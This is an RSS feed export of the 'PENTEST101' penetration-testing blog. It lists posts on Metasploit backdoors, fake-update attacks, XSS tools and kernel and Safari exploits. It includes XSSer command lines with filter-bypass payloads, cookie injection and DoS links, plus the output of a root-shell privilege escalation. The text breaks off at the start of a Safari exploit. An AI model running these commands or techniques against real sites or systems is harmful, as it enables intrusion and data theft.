<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>PENTEST101</title><description>[ PENETRATION TESTING ]</description><managingEditor>noreply@blogger.com (pentest101)</managingEditor><pubDate>Fri, 1 Nov 2024 02:04:31 -0700</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">30</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://pentest101.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>[ PENETRATION TESTING ]</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Simple Port Scanner</title><link>http://pentest101.blogspot.com/2011/03/simple-port-scanner.html</link><category>PYTHON</category><author>noreply@blogger.com (Pentest101)</author><pubDate>Tue, 1 Mar 2011 08:15:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1927756353704737863</guid><description>&lt;script src="http://pastebin.com/embed_js.php?i=Sq5Z3VYG"&gt;&lt;/script&gt;&lt;br /&gt;
&lt;br&gt;&lt;br /&gt;
http://pastie.org/1621162</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></item><item><title>SET - SMS Spoofing Attack</title><link>http://pentest101.blogspot.com/2011/02/set-sms-spoofing-attack_16.html</link><category>set</category><author>noreply@blogger.com (Pentest101)</author><pubDate>Wed, 16 Feb 2011 00:10:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-8704074046009762853</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;script src="http://pastebin.com/embed_js.php?i=7hSUR1j2"&gt;&lt;/script&gt;&lt;br /&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><title>Metasploit PHP Shell</title><link>http://pentest101.blogspot.com/2011/02/metasploit-php-shell_12.html</link><author>noreply@blogger.com (Pentest101)</author><pubDate>Sat, 12 Feb 2011 09:50:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-5384695437346658537</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;script src="http://pastebin.com/embed_js.php?i=5G1sH1x9"&gt;&lt;/script&gt;&lt;br /&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>XSSploit</title><link>http://pentest101.blogspot.com/2010/09/xssploit_28.html</link><category>TOOLS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Tue, 28 Sep 2010 19:50:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-8251098386815684598</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.scrt.ch/imagesite/xssploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://www.scrt.ch/imagesite/xssploit.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Introduction :&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.&lt;br /&gt;&lt;br /&gt;When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.&lt;br /&gt;&lt;br /&gt;The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.&lt;br /&gt;&lt;br /&gt;A &lt;a href="http://www.scrt.ch/outils/xssploit/video.htm"&gt;video&lt;/a&gt; is available to explain how to use of XSSploit. &lt;br /&gt;&lt;h3 style="color: red; font-weight: normal;"&gt;Requirements :&lt;/h3&gt;The following elements are required by XSSploit:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://www.python.org/"&gt;Python 2.5&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.wxpython.org/"&gt;wxPython&lt;/a&gt; GUI toolkit &lt;br /&gt;&lt;h3 style="color: red; font-weight: normal;"&gt;Download : &lt;span style="font-size: small;"&gt;&lt;span style="color: black;"&gt;http://www.scrt.ch/outils/xssploit/Xssploit-0.5.tar.gz&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 style="color: red; font-weight: normal;"&gt;Source : &lt;span style="font-size: small;"&gt;&lt;span style="color: black;"&gt;http://www.scrt.ch/pages_en/xssploit.html&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>[ TOOLS ] : XSSer</title><link>http://pentest101.blogspot.com/2010/09/tools-xsser_25.html</link><category>TOOLS</category><author>noreply@blogger.com (Pentest101)</author><pubDate>Sat, 25 Sep 2010 03:20:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1395250839527599069</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://xsser.sourceforge.net/xsser/sc_Xsser1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://xsser.sourceforge.net/xsser/sc_Xsser1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;XSSer&lt;/span&gt; is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.&lt;br /&gt;&lt;br /&gt;It contains several options to try to bypass certain filters, and various special techniques of code injection.&lt;br /&gt;&lt;br /&gt;&lt;h1 style="color: lime; font-weight: normal;"&gt;&lt;span style="font-size: small;"&gt;Usage&lt;/span&gt;&lt;/h1&gt;python XSSer.py [-u |-i |-d ] [-p |-g |-c ] [OPTIONS] [Request] [Bypassing] [Techniques]&lt;br /&gt;&lt;br /&gt;&lt;h1 style="color: lime;"&gt;&lt;span style="font-size: small;"&gt;Examples&lt;/span&gt;&lt;/h1&gt;&lt;span style="font-size: small;"&gt;* Simple injection from URL:&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com"&lt;br /&gt;-------------------&lt;br /&gt;* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"&lt;br /&gt;-------------------&lt;br /&gt;* Multiple injections from URL, with fuzzing, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --Fuzz --Hex --verbose -w&lt;br /&gt;-------------------&lt;br /&gt;* Multiple injections from URL, with fuzzing, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" --Fuzz --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"&lt;br /&gt;-------------------&lt;br /&gt;* Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Injection from Dork selecting "duck" engine (XSSer Storm!):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py --De "duck" -d "search.php?"&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -c3 --Cw=4 -u "http://host.com"&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Simple injection from URL, using POST, with statistics results:&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" -p "index.php?target=search&amp;amp;subtarget=top&amp;amp;searchstring=" -s&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Multiple injections from URL to a parameter sending with GET, using Fuzzing, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Fuzz --Doo --short tinyurl &lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Coo --Anchor --Fr="!enter your final injection code here!"&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Multiple injections to multiple places, extracting targets from a list in a FILE, applying Fuzzing, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!): &lt;br /&gt;&lt;br /&gt;$ python XSSer.py -i "list_of_url_targets.txt" --Fuzz --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"&lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.&lt;br /&gt;&lt;br /&gt;$ pyton XSSer.py --Imx "test.png" --payload "!enter your malicious injection code here!" &lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"    &lt;br /&gt;&lt;br /&gt;-------------------&lt;br /&gt;* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to &lt;a href="http://identi.ca/"&gt;http://identi.ca&lt;/a&gt;&lt;br /&gt;(federated XSS pentesting botnet)&lt;br /&gt;&lt;br /&gt;$ python XSSer.py -d "login.php" --De "duck" --publish&lt;/span&gt;                &lt;br /&gt;http://xsser.sourceforge.net&lt;br /&gt;&lt;div style="color: lime;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;b style="color: lime;"&gt;Download :&amp;nbsp;&lt;/b&gt; &lt;br /&gt;http://downloads.sourceforge.net/xsser/xsser-1.0b.tar.gz&lt;br /&gt;&lt;br /&gt;&lt;b style="color: lime;"&gt;Source :&lt;/b&gt;&lt;br /&gt;http://xsser.sourceforge.net&lt;b style="color: lime;"&gt; &lt;/b&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>METASPLOIT TRAINING V2</title><link>http://pentest101.blogspot.com/2010/07/metasploit-training-v2_26.html</link><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 26 Jul 2010 01:55:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-357901064186381370</guid><description>&lt;span style="color: red;"&gt;METASPLOIT TRAINING V2.0(2010) : BY PENTEST101 TEAM&lt;/span&gt;&lt;br /&gt;BLOG : Pentest101.BlogSpot.Com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;METASPLOIT FRAMEWORK :&lt;br /&gt;&lt;br /&gt;Metasploit - Penetration Testing Resources&lt;br /&gt;Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project managed by Rapid7. &lt;br /&gt;&lt;br /&gt;official site : &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; http://www.metasploit.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;before we start this training :&lt;br /&gt;- all this courses belong to pentest101 team .&lt;br /&gt;- this courses , for educational purpose only .&lt;br /&gt;- we are not responsible for any bad usage .&lt;br /&gt;good , we can start noW . &lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;You ArE FreE To SHARE the METASPLOIT TRAINING V2&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;blockquote&gt;------------auxiliary---------------&lt;br /&gt;- auxiliary portscan&lt;br /&gt;- auxiliary smb version&lt;br /&gt;- auxiliary smb login check&lt;br /&gt;&lt;br /&gt;------------hacking-xp--------------&lt;br /&gt;- hacking xp sp3(bind)&lt;br /&gt;- hacking xp sp3(reverse)&lt;br /&gt;- hacking xp sp3(vncinject)&lt;br /&gt;&lt;br /&gt;------------backdoors---------------&lt;br /&gt;- make a backdoor : linux/x86&lt;br /&gt;- make a backdoor (backdoor.py)&lt;br /&gt;- encode a backdoor&lt;br /&gt;- encode a backdoor (backdoor.py)&lt;br /&gt;- make and encode a backdoor (with metasploit and sniff email u/p)&lt;br /&gt;- script proback.py (backdoors for win32 linux osx)&amp;nbsp;&amp;nbsp; &lt;br /&gt;&lt;br /&gt;------------meterpreter-------------&lt;br /&gt;- meterpreter commands&lt;br /&gt;- Meterpreter (screensht and key_scan)&lt;br /&gt;- meterpreter packet's sniffing &lt;br /&gt;- meterpreter metscv&lt;br /&gt;&lt;br /&gt;------------advanced-usage----------&lt;br /&gt;- autopwn&lt;br /&gt;- browser autopwn&lt;br /&gt;- file autopwn&lt;br /&gt;- java signed applet&lt;br /&gt;- fake update msf and ettercap&lt;br /&gt;- discovering and exploiting remote buffer overflow&lt;br /&gt;- discovering and exploiting remote buffer overflow (egg-hunter)&lt;/blockquote&gt;&lt;br /&gt;DOWNLOAD LINK : http://www.megaupload.com/?d=HU32VOI0&lt;br /&gt;PASSWORD : pentest101&lt;br /&gt;&lt;span style="color: red;"&gt;you will help us by a small donation : http://pentest101.blogspot.com/p/donate.html &lt;/span&gt;&lt;br /&gt;#Pentest101.blogspot.com .</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">8</thr:total></item><item><title>[ METASPLOIT ] : JAVA-SIGNED-APPLET</title><link>http://pentest101.blogspot.com/2010/07/metasploit-java-signed-applet.html</link><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 19 Jul 2010 12:04:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-5526469856101808078</guid><description>&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=13413694&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=13413694&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href="http://vimeo.com/13413694"&gt;[ METASPLOIT ] : java-signed-applet&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;apt-get install sun-java6-jdk&lt;br /&gt;echo "JAVA_HOME=/usr/lib/jvm/java-6-sun" &amp;gt;&amp;gt; /etc/bash.bashrc&lt;br /&gt;echo "export JAVA_HOME" &amp;gt;&amp;gt; /etc/bash.bashrc&lt;br /&gt;JAVA_HOME=/usr/lib/jvm/java-6-sun&lt;br /&gt;export JAVA_HOME&lt;br /&gt;gem install rjb&lt;/blockquote&gt;Have Fun</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>[ BACKTRACK ] : FAKE UPDATE [ MSF , ETTERCAP ]</title><link>http://pentest101.blogspot.com/2010/07/backtrack-fake-update-msf-ettercap.html</link><category>BACKTRACK</category><category>METASPLOIT</category><category>VIDEOS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Sun, 11 Jul 2010 08:34:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-7331915970444451441</guid><description>hi all,&lt;br /&gt;&lt;br /&gt;FAKE UPDATE : MSF , ETTERCAP (demo)&lt;br /&gt;&lt;br /&gt;&lt;object height="240" width="400"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=13245482&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=13245482&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="240"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://vimeo.com/13245482"&gt;FAKE UPDATE : MSF , ETTERCAP&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HTML FAKE PAGE : &lt;a href="http://pastebin.com/LPVardiq"&gt;http://pastebin.com/LPVardiq&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>[ BACKTRACK ] : HACKING METASPLOITABLE  P1 P2.</title><link>http://pentest101.blogspot.com/2010/06/backtrack-hacking-metasploitable-p1-p2.html</link><category>BACKTRACK</category><category>LINUX</category><category>METASPLOIT</category><category>VIDEOS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 21 Jun 2010 12:04:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-8163179715903236785</guid><description>PART1 :&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=12719938&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=12719938&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href="http://vimeo.com/12719938"&gt;metasploitable real hacking P1&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;PART2 :&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=12735350&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=12735350&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a href="http://vimeo.com/12735350"&gt;metasploitable real hacking P2&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;metasploitable : http://www.metasploit.com/documents/express/Metasploitable.zip.torrent</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>[ METASPLOIT ] : FILE_AUTOPWN</title><link>http://pentest101.blogspot.com/2010/06/metasploit-fileautopwn.html</link><category>METASPLOIT</category><category>VIDEOS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Sun, 20 Jun 2010 06:17:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-4937601040289284528</guid><description>hi all&lt;br /&gt;&lt;br /&gt;server/file_autopwn&lt;br /&gt;&lt;br /&gt;&lt;object height="300" width="400"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=12709472&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=12709472&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="250"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://vimeo.com/12709472"&gt;[ METASPLOIT ] : FILE_AUTOPWN&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com/"&gt;Vimeo&lt;/a&gt;.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>[ NEWS ] : offensive-security-hacking-tournament</title><link>http://pentest101.blogspot.com/2010/04/news-offensive-security-hacking.html</link><category>NEWS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Wed, 21 Apr 2010 08:37:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-3317129724701125071</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.information-security-training.com/wp-content/uploads/2010/04/kung-fu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="173" src="http://www.information-security-training.com/wp-content/uploads/2010/04/kung-fu.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Got the itch to hack something but don’t want to spend time in prison?  Do you wish there was a legal way you could hack some servers just for fun? Then we have a challenge for you. &lt;span style="color: red;"&gt;Offensive Security Training&lt;/span&gt; is initiating its first ever “Open Hacking Tournament” , and as you can imagine, we’re not going to play fair.&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;What do you have to do to win this challenge?&lt;/b&gt;&lt;/span&gt; Use the Internet, use your skills, call your friends, heck, ask your mama – whatever it takes for you to hack our lab machines.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You will race against the clock and against other “hackers” to be the first to compromise all our lab servers, in a CTF style, “sudden death” tournament.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;span style="color: #ff6600;"&gt;On the Table: &lt;/span&gt;&lt;/b&gt;One FREE, PWB OR CTP online course with 30 days of labs for the single winner.&lt;/div&gt;&lt;span style="color: #ff6600;"&gt;&lt;b&gt;On the Clock&lt;/b&gt;&lt;/span&gt;: The contest will commence between the 8th and 9th of May, 2010.&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;&lt;b&gt;Job to be Done:&lt;/b&gt;&lt;/span&gt; Hack the living heck out of our challenge servers, and submit your documentation.&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;&lt;b&gt;How to Win:&lt;/b&gt;&lt;/span&gt; Hack us the fastest.&lt;br /&gt;&lt;br /&gt;more informations :&lt;br /&gt;&lt;blockquote&gt;http://www.information-security-training.com/news/offensive-security-hacking-tournament/&lt;/blockquote&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ NEWS ] : Linux Kernel &amp;lt;= 2.6.34-rc3 ReiserFS xattr Privilege Escalation</title><link>http://pentest101.blogspot.com/2010/04/news-linux-kernel-2634-rc3-reiserfs_10.html</link><category>NEWS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Sat, 10 Apr 2010 02:32:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1121981003298105888</guid><description>Author: Jon Oberheide &lt;br /&gt;Usage:&lt;br /&gt;&lt;br /&gt;$ python team-edward.py&lt;br /&gt;[+] checking for reiserfs mount with user_xattr mount option&lt;br /&gt;[+] checking for private xattrs directory at /.reiserfs_priv/xattrs&lt;br /&gt;[+] preparing shell in /tmp&lt;br /&gt;[+] capturing pre-shell snapshot of private xattrs directory&lt;br /&gt;[+] compiling shell in /tmp&lt;br /&gt;[+] setting dummy xattr to get reiserfs object id&lt;br /&gt;[+] capturing post-shell snapshot of private xattrs directory&lt;br /&gt;[+] found 1 new object ids&lt;br /&gt;[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468&lt;br /&gt;[+] spawning setuid shell...&lt;br /&gt;# id&lt;br /&gt;uid=0(root) gid=0(root) groups=4(adm), ...&lt;br /&gt;&lt;br /&gt;Notes:&lt;br /&gt;&lt;br /&gt;Obviously requires a ReiserFS filesystem mounted with extended attributes.&lt;br /&gt;Tested on Ubuntu Jaunty 9.10.&lt;br /&gt;'''&lt;br /&gt;&lt;br /&gt;http://www.exploit-db.com/exploits/12130</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW (egg-hunter)</title><link>http://pentest101.blogspot.com/2010/04/buffer-overflow-metasploit-and-remote.html</link><category>BUFFER OVERFLOW</category><author>noreply@blogger.com (pentest101)</author><pubDate>Thu, 1 Apr 2010 06:57:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-8209123600689577199</guid><description>&lt;iframe src="http://player.vimeo.com/video/15100452" width="400" height="300" frameborder="0"&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/15100452"&gt;MSF &amp; Remote Buffer Overflow (egg-hunter)&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>[NEWS] : Apple Safari | Tag (heap spray) Remote Buffer Overflow Exploit (osX)</title><link>http://pentest101.blogspot.com/2010/03/news-apple-safari-tag-heap-spray-remote.html</link><category>NEWS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Fri, 26 Mar 2010 08:40:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-5771453674391514388</guid><description>safari : remote bof&lt;br /&gt;&lt;br /&gt;Exploit Code :&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: sans,verdana,helvetica,arial; font-size: 9.4px;"&gt;#!/usr/bin/env python&lt;br /&gt;#######################################################&lt;br /&gt;# &lt;br /&gt;# Title: Apple Safari &amp;lt;= Tag (heap spray) Remote BOF Exploit (osX)&lt;br /&gt;# Author: eidelweiss&lt;br /&gt;# Special Thank`s to: AL-MARHUM - [D]eal [C]yber - all Senior MEDANHACKER&lt;br /&gt;# Greats: JosS (hackown) , r0073r &amp;amp; 0x1D (inj3ct0r) , kuris (good job beib&lt;br /&gt;LOL)&lt;br 